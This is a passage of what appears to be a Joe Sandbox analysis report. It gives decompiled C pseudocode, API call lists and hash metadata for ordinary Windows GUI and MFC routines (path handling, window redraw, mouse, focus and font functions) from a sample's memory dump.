                  								__eflags = _t289;
                  							}
                  							E0042AAF2(_t318, _t323,  *( *((intOrPtr*)(_t328 + 0x74)) + 0x20) - (_t323 -  *((intOrPtr*)( *((intOrPtr*)(_t328 + 0x74)) + 0x1c)) >> 1) - 1, _t289 + _t289 + _t318, 0xffffffff);
                  							_t224 = E00429211(_t289 + _t289 +  *(_t329 - 0x10));
                  							_t330 = _t330 + 0x14;
                  							_t323 = _t323 + 2 + _t224 * 2;
                  							__imp__CoTaskMemFree( *(_t329 - 0x10));
                  							_t245 = 0;
                  							__eflags = 0;
                  						}
                  						_t197 =  *((intOrPtr*)(_t329 - 0x18));
                  						 *((intOrPtr*)( *_t197 + 8))(_t197);
                  						_t199 =  *((intOrPtr*)(_t328 + 0x74));
                  						_t279 =  *(_t199 + 0x20);
                  						_t200 =  *((intOrPtr*)(_t199 + 0x1c));
                  						__eflags = _t323 - _t200 + _t279 * 2 - 2;
                  						if(_t323 >= _t200 + _t279 * 2 - 2) {
                  							break;
                  						}
                  						_t211 =  *((intOrPtr*)(_t329 - 0x1c));
                  						_t212 =  *((intOrPtr*)( *_t211 + 0xc))(_t211, 1, _t329 - 0x18, _t329 - 0x2c);
                  						__eflags = _t212;
                  						if(_t212 == 0) {
                  							continue;
                  						}
                  						break;
                  					}
                  					_t202 =  *((intOrPtr*)(_t328 + 0x74));
                  					_t280 =  *(_t202 + 0x20);
                  					_t203 =  *((intOrPtr*)(_t202 + 0x1c));
                  					__eflags = _t323 - _t203 + _t280 * 2 - 2;
                  					if(_t323 >= _t203 + _t280 * 2 - 2) {
                  						__eflags = 0;
                  						 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t328 + 0x74)) + 0x1c)) +  *( *((intOrPtr*)(_t328 + 0x74)) + 0x20) * 2 - 4)) = 0;
                  						 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t328 + 0x74)) + 0x1c)) +  *( *((intOrPtr*)(_t328 + 0x74)) + 0x20) * 2 - 2)) = 0;
                  					} else {
                  						 *_t323 = 0;
                  					}
                  					 *(_t329 - 4) =  *(_t329 - 4) | 0xffffffff;
                  					__eflags =  *((intOrPtr*)(_t329 - 0x14)) + 0xfffffff0;
                  					E004055F0( *((intOrPtr*)(_t329 - 0x14)) + 0xfffffff0);
                  					goto L24;
                  				}
                  				_t231 =  *((intOrPtr*)(_t329 - 0x28));
                  				_t319 = _t329 - 0x10;
                  				 *(_t329 - 0x10) = 0;
                  				_t232 =  *((intOrPtr*)( *_t231 + 0x14))(_t231, 0x80058000, _t329 - 0x10);
                  				_t335 = _t232;
                  				if(_t232 >= 0) {
                  					_push( *(_t329 - 0x10));
                  					E00410F00(0, _t329 - 0x14, 1, __ecx, _t335);
                  					 *(_t329 - 4) = 0;
                  					PathRemoveFileSpecW(E00412509(_t329 - 0x14));
                  					_t245 = 0xffffffff;
                  					E0040E100(0xffffffff, _t329 - 0x14, 1, 0xffffffff);
                  					_t326 =  *( *((intOrPtr*)(_t329 - 0x14)) - 0xc);
                  					_t298 =  *(_t329 - 0x10);
                  					if(( *(_t329 - 0x10))[_t326] == 0x5c) {
                  						_t326 = _t326 + 1;
                  					}
                  					E0042AAF2(_t319,  *((intOrPtr*)( *((intOrPtr*)(_t328 + 0x74)) + 0x1c)),  *( *((intOrPtr*)(_t328 + 0x74)) + 0x20) - 1, _t298, _t245);
                  					E0042AAF2(_t319,  *((intOrPtr*)( *((intOrPtr*)(_t328 + 0x74)) + 0x24)),  *((intOrPtr*)( *((intOrPtr*)(_t328 + 0x74)) + 0x28)),  &(( *(_t329 - 0x10))[_t326]), _t245);
                  					_t323 =  *((intOrPtr*)(_t328 + 0x74));
                  					 *((short*)( *((intOrPtr*)(_t323 + 0x1c)) + 2 + E00429211( *((intOrPtr*)(_t323 + 0x1c))) * 2)) = 0;
                  					__imp__CoTaskMemFree( *(_t329 - 0x10));
                  					_t338 =  *((intOrPtr*)(_t329 - 0x14)) + 0xfffffff0;
                  					 *(_t329 - 4) = _t245;
                  					E004055F0( *((intOrPtr*)(_t329 - 0x14)) + 0xfffffff0);
                  				}
                  				_t181 =  *((intOrPtr*)(_t329 - 0x28));
                  				goto L27;
                  			}








































                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041360C
                  • PathRemoveFileSpecW.SHLWAPI(00000000), ref: 0041366D
                  • _wcslen.LIBCMT ref: 004136BE
                  • CoTaskMemFree.OLE32(?), ref: 004136D3
                  • PathRemoveFileSpecW.SHLWAPI(?), ref: 00413795
                  • _wcslen.LIBCMT ref: 004137B1
                  • CoTaskMemFree.OLE32(?), ref: 004137C0
                  • PathRemoveFileSpecW.SHLWAPI(00000000), ref: 004137F3
                    • Part of subcall function 00410F00: __EH_prolog3.LIBCMT ref: 00410F07
                    • Part of subcall function 00410F00: _DebugHeapAllocator.LIBCPMTD ref: 00410F35
                  • _wcslen.LIBCMT ref: 0041383A
                  • CoTaskMemFree.OLE32(?), ref: 00413849
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: FileFreePathRemoveSpecTask_wcslen$H_prolog3$AllocatorDebugHeap
                  • String ID:
                  • API String ID: 865463310-0
                  • Opcode ID: 8f7a1aefae79caaeb176ef5cbfe06fd0edf6fea990f5910b5767b2e7b65f2a73
                  • Instruction ID: 05f6ec17bae3d0c622d2692c3c51bd0e58be28d221e8f94d8a5f5602e28de85d
                  • Opcode Fuzzy Hash: 8f7a1aefae79caaeb176ef5cbfe06fd0edf6fea990f5910b5767b2e7b65f2a73
                  • Instruction Fuzzy Hash: F4C14B70A0050AEFCB04DFA8C985DAEB7B5FF88314B10465DF512AB3A1DB35AD45CB64
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 90%
                  			E00401D80(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed int _a28) {
                  				char _v8;
                  				char _v16;
                  				char _v20;
                  				char _v24;
                  				signed int _v28;
                  				intOrPtr _v32;
                  				char _v36;
                  				char _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				signed int _t73;
                  				void* _t82;
                  				signed char _t92;
                  				void* _t100;
                  				void* _t114;
                  				void* _t118;
                  				void* _t171;
                  				void* _t172;
                  				signed int _t173;
                  				void* _t174;
                  				void* _t175;
                  
                  				_push(0xffffffff);
                  				_push(E004383F0);
                  				_push( *[fs:0x0]);
                  				_t175 = _t174 - 0x20;
                  				_t73 =  *0x44c364; // 0xa6e2bca1
                  				_push(_t73 ^ _t173);
                  				 *[fs:0x0] =  &_v16;
                  				if(_a20 != 0) {
                  					E00404EB0(_t118, _a16, _t171, _t172, 0x443404);
                  				}
                  				E00404820( &_v24);
                  				_v8 = 0;
                  				E00404820( &_v20);
                  				_v8 = 1;
                  				_v28 = 0;
                  				while(_v28 < _a8) {
                  					_v32 = _v28 * 0x4c + _a4;
                  					_t92 = E00401FA0(_v32 + 0x10, _v32 + 0x10, _a24);
                  					_t175 = _t175 + 8;
                  					if((_t92 & 0x000000ff) == 0) {
                  						E00404FB0( &_v36,  *((intOrPtr*)(_v32 + 0x2c)));
                  						_v8 = 2;
                  						_v44 = E00404FB0( &_v40,  *((intOrPtr*)(_v32 + 0x28)));
                  						_v48 = _v44;
                  						_v8 = 3;
                  						_t100 = E004049A0( &_v20, E0040A540(_v48));
                  						_v8 = 2;
                  						E00404FD0(_t100,  &_v40);
                  						E004049A0( &_v20, 0x43ab7c);
                  						E004049A0( &_v20, E0040A540( &_v36));
                  						E004049A0( &_v20, 0x43ab78);
                  						E00404A40( &_v20, _a28 & 0x0000ffff);
                  						E004049A0( &_v20, E0040A540( &_v36));
                  						E00404A40( &_v20, _a28 & 0x0000ffff);
                  						E00404EB0(_t118, _a16, _t171, _t172, _v32 + 0x10);
                  						if((E00404E60( &_v24) & 0x000000ff) == 0) {
                  							E004049A0( &_v24, 0x43ab74);
                  						}
                  						_t114 = E004049A0( &_v24, E0040A540( &_v36));
                  						_v8 = 1;
                  						E00404FD0(_t114,  &_v36);
                  					}
                  					_v28 = _v28 + 1;
                  				}
                  				if(_a20 != 0) {
                  					E00404DA0(_a12, _a20);
                  					E00404DC0(_a12, _a28 & 0x0000ffff);
                  					E00404D80(_a12,  &_v24);
                  					E00404DC0(_a12, _a28 & 0x0000ffff);
                  				}
                  				E00404D80(_a12,  &_v20);
                  				E00404DC0(_a12, _a28 & 0x0000ffff);
                  				if(E0040B290(_a16) == 0) {
                  					E00404DC0(_a12, _a28 & 0x0000ffff);
                  				}
                  				_v8 = 0;
                  				E00404840( &_v20);
                  				_v8 = 0xffffffff;
                  				_t82 = E00404840( &_v24);
                  				 *[fs:0x0] = _v16;
                  				return _t82;
                  			}

                  APIs
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401E56
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401E6F
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401E80
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401E8D
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401EAB
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401EE3
                  • _DebugHeapAllocator.LIBCPMTD ref: 00401EF4
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: AllocatorDebugHeap
                  • String ID:
                  • API String ID: 571936431-0
                  • Opcode ID: a46f1abc368a64c7e8cee9726e8fc200ce1597963533e7c0d10cdf3b03dde394
                  • Instruction ID: 75f4d119a9a015ebfc198b74645a136ec549dedc4480b17ca40186e4ba262b1f
                  • Opcode Fuzzy Hash: a46f1abc368a64c7e8cee9726e8fc200ce1597963533e7c0d10cdf3b03dde394
                  • Instruction Fuzzy Hash: 795129B19101599BCB08EF95D892AFFB375BF94308F10412EF612772D1DB386A14CBA9
                  Uniqueness

                  Uniqueness Score: 4.01%

                  C-Code - Quality: 100%
                  			E004232E3(void* __ecx, int _a4) {
                  				int _v8;
                  				struct tagRECT _v24;
                  				long _t39;
                  				int _t42;
                  				int _t43;
                  				int _t62;
                  				int _t66;
                  				void* _t68;
                  				long _t69;
                  				int _t71;
                  
                  				_t69 = _a4;
                  				_t68 = __ecx;
                  				_t39 = DefWindowProcW( *(__ecx + 0x20), 0x46, 0, _t69);
                  				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
                  					GetWindowRect( *(_t68 + 0x20),  &_v24);
                  					_t42 = _a4;
                  					_t66 =  *(_t42 + 0x10);
                  					_t71 = _v24.right - _v24.left;
                  					_t62 = _v24.bottom - _v24.top;
                  					_t43 =  *(_t42 + 0x14);
                  					_v8 = _t66;
                  					_a4 = _t43;
                  					if(_t66 != _t71 && ( *(_t68 + 0x84) & 0x00000400) != 0) {
                  						SetRect( &_v24, _t66 -  *0x44fc20, 0, _t66, _t43);
                  						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
                  						SetRect( &_v24, _t71 -  *0x44fc20, 0, _t71, _a4);
                  						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
                  						_t66 = _v8;
                  						_t43 = _a4;
                  					}
                  					if(_t43 != _t62 && ( *(_t68 + 0x84) & 0x00000800) != 0) {
                  						SetRect( &_v24, 0, _t43 -  *0x44fc24, _t66, _t43);
                  						InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
                  						SetRect( &_v24, 0, _t62 -  *0x44fc24, _v8, _t62);
                  						_t43 = InvalidateRect( *(_t68 + 0x20),  &_v24, 1);
                  					}
                  					return _t43;
                  				}
                  				return _t39;
                  			}

                  APIs
                  • DefWindowProcW.USER32(?,00000046,00000000,?), ref: 004232FA
                  • GetWindowRect.USER32(?,?), ref: 00423312
                  • SetRect.USER32(?,?,00000000,?,?), ref: 00423352
                  • InvalidateRect.USER32(?,?,00000001), ref: 00423361
                  • SetRect.USER32(?,?,00000000,?,?), ref: 00423378
                  • InvalidateRect.USER32(?,?,00000001), ref: 00423387
                  • SetRect.USER32(?,00000000,?,?,?), ref: 004233B8
                  • InvalidateRect.USER32(?,?,00000001), ref: 004233C3
                  • SetRect.USER32(?,00000000,?,?,?), ref: 004233DA
                  • InvalidateRect.USER32(?,?,00000001), ref: 004233E5
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Rect$Invalidate$Window$Proc
                  • String ID:
                  • API String ID: 570070710-0
                  • Opcode ID: 0aef33b4db466b83b4f8328b8fad394f1946fd2b9da50446824a51982093460d
                  • Instruction ID: 52fc93fc332d92a77a98e75e025793c6dc5392896520ca2ae7a29eb4a3493525
                  • Opcode Fuzzy Hash: 0aef33b4db466b83b4f8328b8fad394f1946fd2b9da50446824a51982093460d
                  • Instruction Fuzzy Hash: BD311C72A40119BFDB04CFA4DD88FAFBBB8FB08314F104125FA45A75A0D775AA14CBA5
                  Uniqueness

                  Uniqueness Score: 1.05%

                  C-Code - Quality: 86%
                  			E00423CC8(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
                  				signed int _v8;
                  				signed int _v12;
                  				intOrPtr _v16;
                  				signed int _v20;
                  				struct tagPOINT _v28;
                  				intOrPtr _v40;
                  				signed int _v72;
                  				char _v76;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t60;
                  				signed int _t62;
                  				signed int _t63;
                  				signed int _t67;
                  				signed int _t70;
                  				intOrPtr _t72;
                  				signed int _t79;
                  				short _t80;
                  				short _t87;
                  				short _t92;
                  				intOrPtr _t111;
                  				intOrPtr _t115;
                  				intOrPtr _t116;
                  				intOrPtr* _t118;
                  
                  				_t115 = _a4;
                  				_t118 = __ecx;
                  				if(E0040C1EC(__ecx, __eflags, _t115) == 0) {
                  					_t116 =  *((intOrPtr*)(_t115 + 4));
                  					_push(__ebx);
                  					_t100 = __ecx;
                  					_t60 = E0040F5D8(__ecx);
                  					__eflags =  *(__ecx + 0x84) & 0x00000020;
                  					_v20 = _t60;
                  					if(( *(__ecx + 0x84) & 0x00000020) != 0) {
                  						L5:
                  						__eflags = _t116 - 0x200;
                  						if(_t116 < 0x200) {
                  							L7:
                  							__eflags = _t116 - 0xa0 - 9;
                  							if(__eflags > 0) {
                  								L30:
                  								_t62 = E0040ED5B(_t118);
                  								__eflags = _t62;
                  								if(_t62 == 0) {
                  									L32:
                  									__eflags = _v20;
                  									if(_v20 == 0) {
                  										L35:
                  										_t63 = IsWindow( *(_t118 + 0x20));
                  										__eflags = _t63;
                  										if(_t63 == 0) {
                  											L37:
                  											__eflags = 0;
                  											return 0;
                  										}
                  										return E0040C7DE(_a4);
                  									} else {
                  										goto L33;
                  									}
                  									while(1) {
                  										L33:
                  										_t117 = _v20;
                  										_t67 =  *((intOrPtr*)( *_v20 + 0x108))(_a4);
                  										__eflags = _t67;
                  										if(_t67 != 0) {
                  											goto L1;
                  										}
                  										_t70 = E0040ED1C(_t117);
                  										_v20 = _t70;
                  										__eflags = _t70;
                  										if(_t70 != 0) {
                  											continue;
                  										}
                  										goto L35;
                  									}
                  									goto L1;
                  								}
                  								__eflags =  *(_t62 + 0x68);
                  								if( *(_t62 + 0x68) != 0) {
                  									goto L37;
                  								}
                  								goto L32;
                  							}
                  							L8:
                  							_v16 = E00420870(0x201, _t100, _t116, _t118, __eflags);
                  							_t72 = _a4;
                  							_v28.y =  *((intOrPtr*)(_t72 + 0x18));
                  							_v28.x =  *(_t72 + 0x14);
                  							ScreenToClient( *(_t118 + 0x20),  &_v28);
                  							E004281D0(_t116,  &_v76, 0, 0x2c);
                  							_v76 = 0x30;
                  							_t79 =  *((intOrPtr*)( *_t118 + 0x74))(_v28.x, _v28.y,  &_v76);
                  							__eflags = _v40 - 0xffffffff;
                  							_v8 = _t79;
                  							if(__eflags != 0) {
                  								_push(_v40);
                  								E00428397(0x201, _t116, _t118, __eflags);
                  							}
                  							__eflags = _t116 - 0x201;
                  							if(_t116 != 0x201) {
                  								L13:
                  								_v12 = _v12 & 0x00000000;
                  								__eflags = _t116 - 0x201;
                  								if(_t116 != 0x201) {
                  									_t92 = GetKeyState(1);
                  									__eflags = _t92;
                  									if(_t92 < 0) {
                  										_v8 =  *((intOrPtr*)(_v16 + 0x4c));
                  									}
                  								}
                  								L16:
                  								__eflags = _v8;
                  								if(_v8 < 0) {
                  									L26:
                  									_t80 = GetKeyState(1);
                  									__eflags = _t80;
                  									if(_t80 >= 0) {
                  										L28:
                  										 *((intOrPtr*)( *_t118 + 0x178))(0xffffffff);
                  										KillTimer( *(_t118 + 0x20), 0xe001);
                  										L29:
                  										 *((intOrPtr*)(_v16 + 0x4c)) = _v8;
                  										goto L30;
                  									}
                  									__eflags = _v12;
                  									if(_v12 == 0) {
                  										goto L29;
                  									}
                  									goto L28;
                  								}
                  								__eflags = _v12;
                  								if(_v12 != 0) {
                  									goto L26;
                  								}
                  								__eflags = _t116 - 0x202;
                  								if(_t116 != 0x202) {
                  									__eflags =  *(_t118 + 0x80) & 0x00000008;
                  									if(( *(_t118 + 0x80) & 0x00000008) != 0) {
                  										L25:
                  										 *((intOrPtr*)( *_t118 + 0x178))(_v8);
                  										goto L29;
                  									}
                  									_t87 = GetKeyState(1);
                  									__eflags = _t87;
                  									if(_t87 < 0) {
                  										goto L25;
                  									}
                  									_t111 = _v16;
                  									__eflags = _v8 -  *((intOrPtr*)(_t111 + 0x4c));
                  									if(_v8 ==  *((intOrPtr*)(_t111 + 0x4c))) {
                  										goto L29;
                  									}
                  									_push(0x12c);
                  									_push(0xe000);
                  									L20:
                  									E004230F3(_t118);
                  									goto L29;
                  								}
                  								 *((intOrPtr*)( *_t118 + 0x178))(0xffffffff);
                  								_push(0xc8);
                  								_push(0xe001);
                  								goto L20;
                  							}
                  							__eflags = _v72 & 0x80000000;
                  							if((_v72 & 0x80000000) == 0) {
                  								goto L13;
                  							}
                  							_v12 = 1;
                  							goto L16;
                  						}
                  						__eflags = _t116 - 0x209;
                  						if(__eflags <= 0) {
                  							goto L8;
                  						}
                  						goto L7;
                  					}
                  					__eflags = _t116 - 0x201;
                  					if(_t116 == 0x201) {
                  						goto L5;
                  					}
                  					__eflags = _t116 - 0x202;
                  					if(_t116 != 0x202) {
                  						goto L30;
                  					}
                  					goto L5;
                  				}
                  				L1:
                  				return 1;
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ClientScreenWindow_memset
                  • String ID: 0
                  • API String ID: 1268500159-4108050209
                  • Opcode ID: cdc9807437cb956ac8afc672a6eea90ebacb15c207460598bf9ec07eb845d660
                  • Instruction ID: 0fec6943d037fae117efffd5b112a6bd77a27c9dfb4363ad2503283f5c7998d1
                  • Opcode Fuzzy Hash: cdc9807437cb956ac8afc672a6eea90ebacb15c207460598bf9ec07eb845d660
                  • Instruction Fuzzy Hash: 3251F031B00215DBCF20DF64E848BAEBBB1AF44306F90046BE855A72D1CB7D9E81CB49
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 93%
                  			E0040F91F(void* __ebx, void* __ecx, signed int _a4, long _a8) {
                  				struct HWND__* _v8;
                  				void* __edi;
                  				void* _t12;
                  				void* _t14;
                  				void* _t15;
                  				void* _t18;
                  				void* _t19;
                  				void* _t29;
                  				struct HWND__* _t30;
                  				signed int _t34;
                  				void* _t37;
                  				void* _t41;
                  
                  				_t29 = __ebx;
                  				_push(__ecx);
                  				_t37 = __ecx;
                  				_t12 = E0040F8F7(__ecx, __ecx);
                  				_t34 = _a4 & 0x0000fff0;
                  				_t41 = _t12;
                  				_t14 = _t34 - 0xf040;
                  				if(_t14 == 0) {
                  					L11:
                  					if(_a8 != 0x75 || _t41 == 0) {
                  						L15:
                  						_t15 = 0;
                  						goto L16;
                  					} else {
                  						E00411E95(_t41);
                  						L14:
                  						_t15 = 1;
                  						L16:
                  						return _t15;
                  					}
                  				}
                  				_t18 = _t14 - 0x10;
                  				if(_t18 == 0) {
                  					goto L11;
                  				}
                  				_t19 = _t18 - 0x10;
                  				if(_t19 == 0 || _t19 == 0xa0) {
                  					if(_t34 == 0xf060 || _a8 != 0) {
                  						if(_t41 != 0) {
                  							_push(_t29);
                  							_t30 =  *(_t37 + 0x20);
                  							_v8 = GetFocus();
                  							E0040E20E(_t30, _t34, SetActiveWindow( *(_t41 + 0x20)));
                  							SendMessageW( *(_t41 + 0x20), 0x112, _a4, _a8);
                  							if(IsWindow(_t30) != 0) {
                  								SetActiveWindow(_t30);
                  							}
                  							if(IsWindow(_v8) != 0) {
                  								SetFocus(_v8);
                  							}
                  						}
                  					}
                  					goto L14;
                  				} else {
                  					goto L15;
                  				}
                  			}

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$ActiveFocus$MessageSend
                  • String ID: u
                  • API String ID: 1556911595-4067256894
                  • Opcode ID: 03c09f66aa66469b41d1ffc97829be183fd41b61f6962f411d1c1fffcaabf90d
                  • Instruction ID: aa23150ff275a4e762f8914b3b23eee449f5484b5983ccff72f0c3de55e904a0
                  • Opcode Fuzzy Hash: 03c09f66aa66469b41d1ffc97829be183fd41b61f6962f411d1c1fffcaabf90d
                  • Instruction Fuzzy Hash: 4D11A2B2500209BBDB346B75CD08B6B7A68EF44350B144437AD41E6AE1D73CDD14DA99
                  Uniqueness

                  Uniqueness Score: 1.05%

                  C-Code - Quality: 94%
                  			E00426026(intOrPtr __ecx, signed int _a4) {
                  				signed int _v8;
                  				char _v72;
                  				void _v100;
                  				intOrPtr _v104;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t12;
                  				void* _t14;
                  				char* _t23;
                  				void* _t29;
                  				signed short _t30;
                  				struct HDC__* _t31;
                  				signed int _t32;
                  
                  				_t12 =  *0x44c364; // 0xa6e2bca1
                  				_v8 = _t12 ^ _t32;
                  				_t31 = GetStockObject;
                  				_t30 = 0xa;
                  				_v104 = __ecx;
                  				_t23 = L"System";
                  				_t14 = GetStockObject(0x11);
                  				if(_t14 != 0) {
                  					L2:
                  					if(GetObjectW(_t14, 0x5c,  &_v100) != 0) {
                  						_t23 =  &_v72;
                  						_t31 = GetDC(0);
                  						if(_v100 < 0) {
                  							_v100 =  ~_v100;
                  						}
                  						_t30 = MulDiv(_v100, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
                  						ReleaseDC(0, _t31);
                  					}
                  					L6:
                  					_t16 = _a4;
                  					if(_a4 == 0) {
                  						_t16 = _t30 & 0x0000ffff;
                  					}
                  					return E00427DFF(E00425F01(_v104, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
                  				}
                  				_t14 = GetStockObject(0xd);
                  				if(_t14 == 0) {
                  					goto L6;
                  				}
                  				goto L2;
                  			}

                  APIs
                  • GetStockObject.GDI32(00000011), ref: 0042604E
                  • GetStockObject.GDI32(0000000D), ref: 00426056
                  • GetObjectW.GDI32(00000000,0000005C,?), ref: 00426063
                  • GetDC.USER32(00000000), ref: 00426072
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00426086
                  • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 00426092
                  • ReleaseDC.USER32(00000000,00000000), ref: 0042609E
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Object$Stock$CapsDeviceRelease
                  • String ID: System
                  • API String ID: 46613423-3470857405
                  • Opcode ID: 92fd478b0662ce9854d8cc054db29d85497dde8bffd41103f762a27921a5552a
                  • Instruction ID: 78313164bb694d8cd67fa6a37877cf86e41f2752e4956e5a9859880c836a19c9
                  • Opcode Fuzzy Hash: 92fd478b0662ce9854d8cc054db29d85497dde8bffd41103f762a27921a5552a
                  • Instruction Fuzzy Hash: 18119031740328ABDB10DBA1ED49FAF7BB9AF54785F40402AFA059B1C0DA749C00DB69
                  Uniqueness

                  Uniqueness Score: 0.23%

                  C-Code - Quality: 98%
                  			E0042312D(intOrPtr* __ecx, intOrPtr _a4) {
                  				signed int _v8;
                  				intOrPtr _v12;
                  				struct tagPOINT _v20;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				short _t42;
                  				signed int _t49;
                  				struct HWND__* _t60;
                  				intOrPtr _t63;
                  				intOrPtr* _t64;
                  				intOrPtr _t66;
                  				void* _t68;
                  				void* _t72;
                  				intOrPtr* _t75;
                  				intOrPtr _t83;
                  				void* _t84;
                  				intOrPtr _t85;
                  				struct HWND__* _t87;
                  				intOrPtr _t88;
                  				intOrPtr* _t89;
                  
                  				_t76 = __ecx;
                  				_t89 = __ecx;
                  				_t42 = GetKeyState(1);
                  				_t90 = _t42;
                  				if(_t42 < 0) {
                  					return _t42;
                  				}
                  				_t85 = E00420870(_t72, _t76, _t84, _t89, _t90);
                  				_v12 = _t85;
                  				GetCursorPos( &_v20);
                  				ScreenToClient( *(_t89 + 0x20),  &_v20);
                  				_t49 =  *((intOrPtr*)( *_t89 + 0x74))(_v20.x, _v20.y, 0, _t84, _t72);
                  				_v8 = _t49;
                  				if(_t49 < 0) {
                  					_t16 = _t85 + 0x4c;
                  					 *_t16 =  *(_t85 + 0x4c) | 0xffffffff;
                  					__eflags =  *_t16;
                  					L18:
                  					if(_v8 < 0) {
                  						L27:
                  						if( *(_v12 + 0x4c) == 0xffffffff) {
                  							KillTimer( *(_t89 + 0x20), 0xe001);
                  						}
                  						 *((intOrPtr*)( *_t89 + 0x178))(0xffffffff);
                  						L30:
                  						_t53 = 0xe000;
                  						if(_a4 == 0xe000) {
                  							_t53 = KillTimer( *(_t89 + 0x20), 0xe000);
                  							if(_v8 >= 0) {
                  								_t53 =  *((intOrPtr*)( *_t89 + 0x178))(_v8);
                  							}
                  						}
                  						return _t53;
                  					}
                  					ClientToScreen( *(_t89 + 0x20),  &_v20);
                  					_push(_v20.y);
                  					_t87 = WindowFromPoint(_v20);
                  					if(_t87 == 0) {
                  						L25:
                  						_t59 = _v12;
                  						_v8 = _v8 | 0xffffffff;
                  						 *(_t59 + 0x4c) =  *(_v12 + 0x4c) | 0xffffffff;
                  						L26:
                  						if(_v8 >= 0) {
                  							goto L30;
                  						}
                  						goto L27;
                  					}
                  					_t60 =  *(_t89 + 0x20);
                  					if(_t87 == _t60 || IsChild(_t60, _t87) != 0) {
                  						goto L26;
                  					} else {
                  						_t63 =  *((intOrPtr*)(_v12 + 0x3c));
                  						if(_t63 != 0) {
                  							_t63 =  *((intOrPtr*)(_t63 + 0x20));
                  						}
                  						if(_t63 == _t87) {
                  							goto L26;
                  						} else {
